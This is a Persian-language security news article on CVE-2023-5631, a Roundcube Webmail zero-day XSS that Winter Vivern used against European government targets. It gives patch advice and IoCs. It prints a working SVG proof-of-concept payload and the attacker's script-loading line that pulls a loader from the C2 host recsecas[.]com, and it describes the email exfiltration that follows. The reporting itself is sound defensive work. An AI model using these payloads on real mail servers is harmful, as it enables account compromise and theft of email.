Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آسیب پذیری زیرودی در Roundcube Webmail هدف هکرهای روسی
  • آسیب پذیری امنیتی
  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید

آسیب پذیری زیرودی در Roundcube Webmail هدف هکرهای روسی

On آبان 6, 1402آبان 6, 1402
seyyid
Share
زمان مطالعه: 4 دقیقه

محققای ESET یه گزارشی منتشر کردن در خصوص یه آسیب پذیری زیرودی XSS در Roundcube Webmail که اخیرا گروه هکری روسی Winter Vivern باهاش نهادهای دولتی و یه اتاق فکر در اروپا رو هک کردن.

جدول زمانی افشای آسیب پذیری :

  • 12 اکتبر 2023 : محققای ESET آسیب پذیری رو به تیم Roundcube گزارش دادن.
  • 14 اکتبر 2023 : تیم Roundcube ، آسیب پذیری رو تایید و اونو اصلاح کرده.
  • 16 اکتبر 2023 : اصلاحیه هایی رو منتشر کرده (1.6.4, 1.5.5, 1.4.15)
  • 18 اکتبر 2023 : ESET CNA یه CVE برای این آسیب پذیری ارائه داده.
  • 25 اکتبر 2023 : گزارش این آسیب پذیری رو منتشر کردن.

آسیب پذیری از نوع XSS هستش و مهاجم میتونه با ارسال یه ایمیل و قرار دادن تگ SVG مخرب در سورس HTML ، این آسیب پذیری رو اکسپلویت و کد دلخواه جاوااسکریپت رو روش اجرا کنه، که معمولا برای سرقت ایمیلهای موجود در اکانت یا موارد دیگه میتونه استفاده بشه.

مثلا کد زیر در سورس HTML ایمیل قرار بدید و ارسال کنید :

 

1
    <svg><use href="dAta:image/s vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">

 

موقع باز کردن ایمیل ، کد زیر اجرا میشه :

 

1
<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>

 

Roundcube یه ابزار متن باز هستش که عمدتا در بخش ایمیل سایتها مورد استفاده قرار میگیره. مثلا CPanel شامل این ابزار هستش.

 

نسخه های آسیب پذیر :

نسخه های قبل از 1.4.15 و 1.5.5 و 1.6.4

نسخه های  اصلاح شده :

برای اینکه تحت تاثیر این آسیب پذیری قرار نگیرید، باید به نسخه های 1.4.15 و 1.5.5 و 1.6.4 ارتقاء بدید.

آسیب پذیری طوری هستش که با باز کردن ایمیل مخرب، هک میشید، بنابراین توصیه شده، حتما بروزرسانی رو اعمال کنید.

 

 

گروه هکری Winter Vivern :

گروه هکری Winter Vivern که قبلا هم مطالبی در خصوصشون منتشر کردیم، یه گروه هکری جاسوسی هستش، که اولین بار در سال 2021 توسط DomainTools شناسایی شد. احتمال میدن حداقل از سال 2020 فعال هستش و عمدتا کشورهای اروپایی و آسیای مرکزی رو هدف قرار میده. تکتیکهایی هم که اغلب استفاده میکنن، اسناد مخرب ، بکدورهای پاورشلی و فیشینگ سایتها هستش. محققای ESET معتقدند که این گروه ، با گروه MoustachedBouncer که همسو با بلاروس ، مرتبط هستش.

Winter Vivern تقریبا از سال 2022 شروع به هدف قرار دادن سرورهای ایمیل Zimbra و Roundcube مرتبط با نهادهای دولتی  کرده. مثلا در آگوست و سپتامبر 2023 ، این گروه از اکسپلویت آسیب پذیری XSS به شناسه CVE-2020-35730 در Roundcube برای هدف قرار دادن قربانیاش، استفاده کرده. البته از این آسیب پذیری گروه Sednit که به APT28 هم معروف هستن، هم سوء استفاده کرده.

 

جزییات فنی آسیب پذیری :

برای اکسپلویت آسیب پذیری CVE-2023-5631 ، مهاجم باید یه ایمیل مخرب رو بسازه و به قربانی ارسال کنه. در این کمپین، این گروه یه ایمیل از team.managment@outlook[.]com و با موضوع Get started in your Outlook ارسال میکنه :

 

ایمیل ارسالی از wintervivern

 

این ایمیل در نگاه اول، مخرب به نظر نمیاد اما اگه کدهای HTML اونو رو مشاهده کنید، همونطور که در شکل زیر قابل مشاهده هستش، در انتهای پیام یه تگ SVG هستش که حاوی یه پیلود base64 شده هستش :

 

سورس کد ایمیل مخرب

 

بصورت دقیقتر :

 

تگ svg

 

اگه این مقدار base64 رو دیکد کنیم (در شکل بالا مقدار پیلود base64 شده کامل نیست و ویرایش شده هستش)، به کد زیر میرسیم :

 

1
<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

 

با توجه به اینکه، مقدار X در ویژگی href معتبر نیست، ویژگی onerror این شی فعال میشه. با دیکد کردن پیلود در ویژگی onerror ، محققا به کد جاوااسکریپت زیر رسیدن که در مرورگر قربانی و در زمینه ی Roundcube session اجرا میشه :

 

JavaScript
1
var fe=document.createElement('script');fe.src="https://recsecas[.]com/controlserver/checkupdate.js";document.body.appendChild(fe);

 

محققا متوجه شدن که این اسکریپت روی یه نمونه اصلاح شده کار میکنه، در نتیجه فهمیدن که با یه آسیب پذیری زیرودی مواجه هستن. این زیرودی در rcube_washtml.php هستش که بدرستی عمل پاکسازی (sanitize) رو انجام نمیده.

پس بطور کلی مهاجم با ساختن یه ایمیل مخرب و ارسال اون میتونه هر کد جاوااسکریپت دلخواه رو در مرورگر قربانی اجرا کنه. تنها تعاملی که قربانی باید انجام بده اینه که ایمیل رو باز کنه.

در مرحله دوم حمله ، یه لودر جاوااسکریپت ساده بنام checkupdate.js رو اجرا میشه: (فایلش رو میتونید از گیتهابمون دانلود کنید)

 

لودر checkupdate.js

 

پیلود نهایی که در شکل زیر مشاهده میکنید، میتونه ایمیلها و فولدرهای موجود در اکانت فعلی Roundcube رو لیست کنه و پیامهای ایمیل استخراج شده رو از طریق HTTP به سرور C2 که آدرسش https://recsecas[.]com/controlserver/saveMessage هست، ارسال کنه.

 

پیلود نهایی

 

IoCهای گزارش :

 

فایلها :

 

SHA-1 Filename Description
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 checkupdate.js JavaScript loader.
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 N/A JavaScript payload exfiltrating emails in Roundcube.

 

شبکه

 

IP Domain Hosting provider First seen Details

38.180.76[.]31

recsecas[.]com M247 Europe SRL 2023-09-28 C&C server

 

آدرس ایمیل :

team.managment@outlook[.]com

 

منبع

 

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی آنالیز بدافزار اخبار بازیگران تهدیدIn Roundcube , Winter Vivern , XSS

راهبری نوشته

نگاهی به مسابقات Pwn2Own Toronto 2023
پلتفرم هکروان تا به امروز بیش از 300 میلیون دلار بانتی داده

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • آسیب پذیری امنیتی
  • اخبار
seyyid
On تیر 23, 1402تیر 23, 1402

آسیب پذیری بحرانی در Cisco SD-WAN vManage

  • اخبار
  • باگ بانتی
seyyid
On بهمن 10, 1401فروردین 28, 1402

گزارش سالانه برنامه باگ بانتی متا در 2022

  • آسیب پذیری امنیتی
  • اخبار
  • امنیت وب
  • انتشارات
  • باگ بانتی
  • پروژه ها
  • توسعه اکسپلویت
  • ماشین آسیب پذیر
  • مقالات
seyyid
On دی 26, 1403

وردپرس آسیب پذیر نسخه ی دسامبر 2024

  • آسیب پذیری امنیتی
  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید
  • توسعه اکسپلویت
  • مقالات
seyyid
On بهمن 25, 1402بهمن 26, 1402

بررسی Patch Tuesday مایکروسافت برای فوریه 2024 (بهمن 1402)

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404